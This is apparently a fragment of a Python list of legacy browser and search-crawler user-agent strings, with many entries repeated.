'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
